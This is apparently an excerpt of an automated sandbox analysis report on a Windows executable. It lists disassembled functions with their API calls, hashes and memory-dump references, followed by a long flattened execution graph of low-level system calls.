                                                          • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                          • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                          • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                          • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                          • wsprintfW.USER32 ref: 00404B4C
                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                          • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                          • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                          • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3081826266
                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                          • GetTickCount.KERNEL32 ref: 00402E8E
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                          • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                          • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                          • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                          • GlobalFree.KERNEL32(?), ref: 0040391C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3081826266
                                                          • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                          • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                          • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                          • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-224404859
                                                          • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                          • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                          • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                          • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                          • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                          • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                          Execution Graph

                                                          Execution Coverage:0%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:77.9%
                                                          Total number of Nodes:1499
                                                          Total number of Limit Nodes:8
                                                          execution_graph: [rendered call-graph data; node and edge listing of the execution graph omitted. Nodes are basic-block addresses in the 0x3591xxxx-0x359fxxxx range with resolved API/functionality labels, predominantly GetPEB and RtlDebugPrintTimes, plus LdrInitializeThunk, ___swprintf_l, _vswprintf_s and __aulldvrm.]
3594531d GetPEB 20164->20163 20165->20159 20166 359453f6 GetPEB 20167 35945408 20166->20167 20167->20169 20170 35945415 GetPEB 20167->20170 20168->20163 20168->20164 20168->20175 20169->20162 20169->20175 20170->20169 20171 3598bcaf GetPEB 20171->20175 20172 3594550a 20174 35945513 GetPEB 20172->20174 20172->20175 20173->20166 20173->20167 20173->20175 20174->20175 20175->20154 20175->20157 20176->20171 20176->20172 20176->20175 20177 359251ed 20178 359251f9 20177->20178 20179 3592521e GetPEB 20178->20179 20182 35925267 20178->20182 20180 35925231 20179->20180 20179->20182 20180->20182 20183 3595d1d0 20180->20183 20184 3595d1e1 20183->20184 20185 3595d223 20183->20185 20184->20185 20186 3595d1e7 GetPEB 20184->20186 20185->20182 20186->20185 20187 3595d1f6 20186->20187 20188 3595d215 20187->20188 20189 35998baf GetPEB 20187->20189 20188->20185 20191 359f52e2 20188->20191 20189->20188 20192 359f5308 20191->20192 20193 359f530c GetPEB 20192->20193 20194 359f531c 20192->20194 20193->20194 20194->20185 21165 359a5319 21168 35962df0 LdrInitializeThunk 21165->21168 21167 359a5340 21168->21167 21529 359a321f 21530 359a3255 21529->21530 21532 359a3326 21530->21532 21533 35931070 21530->21533 21534 35977eb0 21533->21534 21535 3593107f GetPEB 21534->21535 21536 3598564c 21535->21536 21541 359310ec 21535->21541 21537 35985664 RtlDebugPrintTimes 21536->21537 21536->21541 21537->21541 21538 3593112a 21543 3598585c GetPEB 21538->21543 21547 3593113e 21538->21547 21539 35985774 21540 359857a4 21539->21540 21546 359857e4 21539->21546 21542 359857b0 RtlDebugPrintTimes 21540->21542 21544 3593187b 21540->21544 21541->21538 21541->21539 21541->21544 21542->21544 21545 35985867 GetPEB 21543->21545 21543->21547 21544->21532 21545->21547 21576 359e903e 21546->21576 21547->21544 21550 359311b3 GetPEB 21547->21550 21554 359311c3 21547->21554 21549 35985822 21549->21544 21588 359191da 21549->21588 21550->21554 21552 35985838 21552->21544 21592 359e92a6 21552->21592 21556 35931215 
21554->21556 21602 35962df0 LdrInitializeThunk 21554->21602 21556->21544 21557 35985a76 GetPEB 21556->21557 21561 35931480 GetPEB 21556->21561 21563 3593145a 21556->21563 21558 35985a8a GetPEB 21557->21558 21559 35985a9d 21558->21559 21560 35931468 21558->21560 21562 359df453 GetPEB 21559->21562 21560->21561 21572 35931499 21561->21572 21562->21560 21563->21558 21563->21560 21564 35985b5f GetPEB 21565 35985b72 GetPEB 21564->21565 21566 35985b85 21565->21566 21567 3593184b 21565->21567 21566->21567 21568 35985b8e GetPEB 21566->21568 21569 35985bc5 GetPEB 21567->21569 21570 35931863 21567->21570 21568->21567 21569->21570 21573 3593186e 21570->21573 21574 35985be1 GetPEB 21570->21574 21571 35985c12 GetPEB 21571->21544 21572->21544 21572->21564 21575 35931840 21572->21575 21573->21544 21573->21571 21574->21573 21575->21565 21575->21567 21577 359e906a 21576->21577 21578 359e9071 21576->21578 21577->21549 21578->21577 21579 359e91ee GetPEB 21578->21579 21581 359e91fe 21578->21581 21586 359e91da 21578->21586 21579->21581 21580 359e92a6 4 API calls 21580->21577 21582 359e9236 21581->21582 21583 359e9226 GetPEB 21581->21583 21582->21577 21584 359e923d GetPEB 21582->21584 21583->21582 21584->21577 21585 359e924c 21584->21585 21585->21586 21587 359e9255 GetPEB 21585->21587 21586->21577 21586->21580 21587->21586 21589 359191ef 21588->21589 21590 35919219 21588->21590 21589->21590 21591 35919240 2 API calls 21589->21591 21590->21552 21591->21590 21593 359e92d6 21592->21593 21594 359e9414 GetPEB 21593->21594 21595 359e9424 21593->21595 21594->21595 21596 359e944a GetPEB 21595->21596 21597 359e9457 21595->21597 21596->21597 21598 359e945e GetPEB 21597->21598 21599 359e9481 21597->21599 21598->21599 21600 359e946d 21598->21600 21599->21544 21600->21599 21601 359e9476 GetPEB 21600->21601 21601->21599 21602->21556 20803 359a7410 20804 35977e54 20803->20804 20805 359a741c GetPEB 20804->20805 20808 359a743c 20805->20808 20806 359a7442 20807 359c7370 12 API calls 20807->20806 
20808->20806 20808->20807 20809 359ab010 20810 359ab043 20809->20810 20812 359ab05b 20810->20812 20813 35962df0 LdrInitializeThunk 20810->20813 20813->20812 21603 35951607 21604 3595164f 21603->21604 21608 35951623 21603->21608 21610 359516cf 21604->21610 21606 35951662 21607 35991a3b 21609 35991a66 GetPEB 21607->21609 21608->21604 21608->21606 21608->21607 21608->21609 21609->21606 21611 35977e54 21610->21611 21612 359516db GetPEB 21611->21612 21613 35951700 21612->21613 21613->21606 21614 35955600 21616 3595560b 21614->21616 21617 3595563f 21616->21617 21618 359556d5 21616->21618 21619 359556e2 21618->21619 21621 359556fe 21619->21621 21622 35955734 GetPEB 21619->21622 21621->21616 21623 35955761 21622->21623 21623->21619 20195 359cf104 20198 359c7370 20195->20198 20197 359cf136 20199 359c737c 20198->20199 20201 359c7397 20199->20201 20202 359c9010 20199->20202 20201->20197 20203 359c9038 20202->20203 20209 359c902e 20202->20209 20204 359c9041 20203->20204 20210 359c915d 20203->20210 20205 359c90a0 20204->20205 20207 359c90ad 20204->20207 20212 359c93f6 20205->20212 20216 359c94e0 20207->20216 20209->20201 20210->20209 20211 359c9353 RtlDebugPrintTimes 20210->20211 20211->20210 20214 359c9419 20212->20214 20213 359c9422 20213->20209 20214->20213 20215 359c946a RtlDebugPrintTimes 20214->20215 20215->20213 20217 359c952b 20216->20217 20218 359c9540 20217->20218 20219 359c9589 20217->20219 20223 359c9695 20217->20223 20220 359c9566 20218->20220 20221 359c9593 GetPEB 20218->20221 20219->20209 20234 359e972b GetPEB 20220->20234 20226 359c9573 20221->20226 20223->20219 20224 359c971c RtlDebugPrintTimes 20223->20224 20229 359c972f 20224->20229 20225 359c967d RtlDebugPrintTimes 20225->20219 20226->20225 20227 359c97cf RtlDebugPrintTimes 20227->20229 20228 359c99d9 RtlDebugPrintTimes 20228->20229 20229->20219 20229->20227 20229->20228 20230 359c9cf1 RtlDebugPrintTimes 20229->20230 20231 359c9b50 RtlDebugPrintTimes 20229->20231 20232 359c98a5 RtlDebugPrintTimes 
20229->20232 20233 359c9a5d RtlDebugPrintTimes 20229->20233 20230->20229 20231->20229 20232->20229 20233->20229 20234->20226 21169 35917330 21170 35917344 21169->21170 21172 35917383 21169->21172 21171 3591735f GetPEB 21170->21171 21170->21172 21171->21172 21173 359a933b 21174 359a934f 21173->21174 21175 359a9354 21173->21175 21179 359a92bc 21174->21179 21177 359a9379 21175->21177 21184 359a930b GetPEB 21175->21184 21180 359a92e7 21179->21180 21181 359a92c5 GetPEB GetPEB 21179->21181 21182 359a9308 21180->21182 21183 359a92ee GetPEB GetPEB 21180->21183 21181->21182 21182->21175 21183->21182 21185 359a9320 GetPEB GetPEB 21184->21185 21186 359a9317 21184->21186 21187 359a9338 21185->21187 21186->21185 21186->21187 21187->21177 20235 35921131 20238 35921183 20235->20238 20236 35921215 RtlDebugPrintTimes 20237 3592123d 20236->20237 20239 3597f590 GetPEB 20238->20239 20240 3597f57e GetPEB 20238->20240 20242 35921202 20238->20242 20239->20242 20241 35933ca0 20240->20241 20241->20239 20242->20236 20242->20237 20243 3595d530 20244 35998d4f 20243->20244 20247 3595d54b 20243->20247 20245 3595d5fe 20246 35998d3e GetPEB 20245->20246 20249 3595d606 20245->20249 20246->20244 20247->20244 20247->20245 20248 3595d5ed GetPEB 20247->20248 20248->20245 21624 35957630 21625 35957653 21624->21625 21627 35957684 21624->21627 21626 35994680 RtlDebugPrintTimes BaseQueryModuleData 21625->21626 21625->21627 21626->21627 20250 3592d534 GetPEB 20251 35983ef0 20250->20251 20253 3592d55d 20250->20253 20252 35983ef9 GetPEB 20251->20252 20251->20253 20252->20253 20254 35983f15 GetPEB 20253->20254 20256 3592d570 20253->20256 20254->20256 20255 3592d5e2 GetPEB 20257 35983fc8 20255->20257 20259 3592d5f3 20255->20259 20256->20255 20261 3592d601 20256->20261 20258 35983fd1 GetPEB 20257->20258 20257->20259 20258->20259 20260 35983fed GetPEB 20259->20260 20259->20261 20260->20261 20262 35967530 20263 35967551 _strnlen 20262->20263 20264 3596753d 20262->20264 20263->20264 20814 359c3430 20815 359c3456 
20814->20815 20816 359c3460 20814->20816 20816->20815 20817 359c3523 20816->20817 20818 359c3545 20816->20818 20817->20815 20819 3594340d GetPEB 20817->20819 20821 3594340d 20818->20821 20819->20815 20822 35943411 20821->20822 20824 35943428 20821->20824 20823 35943417 GetPEB 20822->20823 20822->20824 20823->20824 20824->20815 20825 359e3430 20826 359e3447 20825->20826 20827 359e3463 20825->20827 20827->20826 20829 359e3492 20827->20829 20830 359e34cb 20829->20830 20832 359e34c3 20829->20832 20830->20826 20832->20830 20833 359e5643 RtlDebugPrintTimes 20832->20833 20834 359e565e 20833->20834 20834->20832 20275 3591b120 20278 3591b136 20275->20278 20277 3591b132 20280 3591b149 20278->20280 20279 3597cdf3 20282 3597ce0d GetPEB 20279->20282 20287 3591b20b 20279->20287 20280->20279 20281 3591b17b GetPEB 20280->20281 20283 3591b184 20280->20283 20280->20287 20281->20283 20282->20287 20284 3591b19b GetPEB 20283->20284 20283->20287 20285 3591b1af 20284->20285 20285->20279 20286 3591b1ba 20285->20286 20286->20287 20288 3591b1f8 GetPEB 20286->20288 20287->20277 20288->20287 20289 359db52f 20291 359db562 20289->20291 20292 359db559 20289->20292 20290 359db793 GetPEB 20290->20292 20294 359db588 20291->20294 20295 35945020 20291->20295 20294->20290 20294->20292 20296 35945037 20295->20296 20298 3594505d 20295->20298 20296->20298 20299 359450e4 20296->20299 20298->20294 20300 3594510f 20299->20300 20301 35945154 20299->20301 20300->20301 20302 35945171 GetPEB 20300->20302 20301->20298 20304 35945187 20302->20304 20303 3594519f GetPEB 20303->20301 20304->20301 20304->20303 21188 35923720 21189 35923742 21188->21189 21190 3592379f GetPEB 21189->21190 21191 359237b1 21190->21191 21196 359e132d 21197 359e134d 21196->21197 21201 359e1346 21196->21201 21198 359e151b 21197->21198 21199 359e150b GetPEB 21197->21199 21200 359e1525 GetPEB 21198->21200 21198->21201 21199->21198 21200->21201 20305 35929126 20306 35929135 20305->20306 20307 3598253e RtlDebugPrintTimes 20306->20307 20309 
359291dd 20306->20309 20310 35982561 20307->20310 20308 3598265e RtlDebugPrintTimes ReleaseActCtx 20308->20309 20310->20308 20310->20309 21202 3595f320 21205 3595f3a9 21202->21205 21203 3598d8ef 21204 3595f5a7 21206 3595f5e4 21204->21206 21212 3595f603 GetPEB 21204->21212 21205->21203 21205->21204 21209 3595f6b6 21205->21209 21218 3595f71f 21209->21218 21211 3595f6f3 21211->21204 21213 3595f62c 21212->21213 21217 3595f677 21212->21217 21214 35921090 RtlDebugPrintTimes 21213->21214 21215 3595f63d 21214->21215 21216 3598d910 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 21215->21216 21215->21217 21216->21217 21217->21206 21219 3595f7d2 21218->21219 21222 3595f749 21218->21222 21220 3598db17 GetPEB 21219->21220 21224 3595f7e8 21219->21224 21221 3598db28 21220->21221 21222->21219 21223 3598da7e GetPEB 21222->21223 21223->21219 21224->21211 21632 359fb627 21634 359fb63d 21632->21634 21633 359fb715 21634->21633 21635 359fb704 RtlDebugPrintTimes 21634->21635 21635->21633 20835 3596d42a 20839 3596d456 20835->20839 20838 3596d453 20840 3596d43f __indefinite 20839->20840 20840->20838 20841 35943429 20842 35943458 20841->20842 20844 359434c0 20842->20844 20845 35943587 20842->20845 20846 359435c0 20845->20846 20847 359435f8 20845->20847 20846->20847 20849 35957505 20846->20849 20847->20842 20850 35957520 20849->20850 20851 3599462e 20849->20851 20850->20851 20852 35957533 GetPEB 20850->20852 20853 3595754e 20852->20853 20854 35945020 2 API calls 20853->20854 20857 35957564 20853->20857 20854->20857 20855 359575b4 GetPEB 20856 359575c8 20855->20856 20856->20847 20857->20855 21225 3594f32a 21228 3594f353 21225->21228 21229 3594f343 21225->21229 21226 3594f3b6 21227 3594f36b GetPEB 21227->21229 21228->21226 21228->21227 20858 359c705e 20859 359e633e 20858->20859 20860 359c7073 GetPEB 20859->20860 20862 359c7086 20860->20862 20861 359c70c0 RtlDebugPrintTimes 20863 359c70ca 20861->20863 20862->20861 20862->20863 20864 359c7108 GetPEB 20863->20864 20865 359c711f 20864->20865 20868 
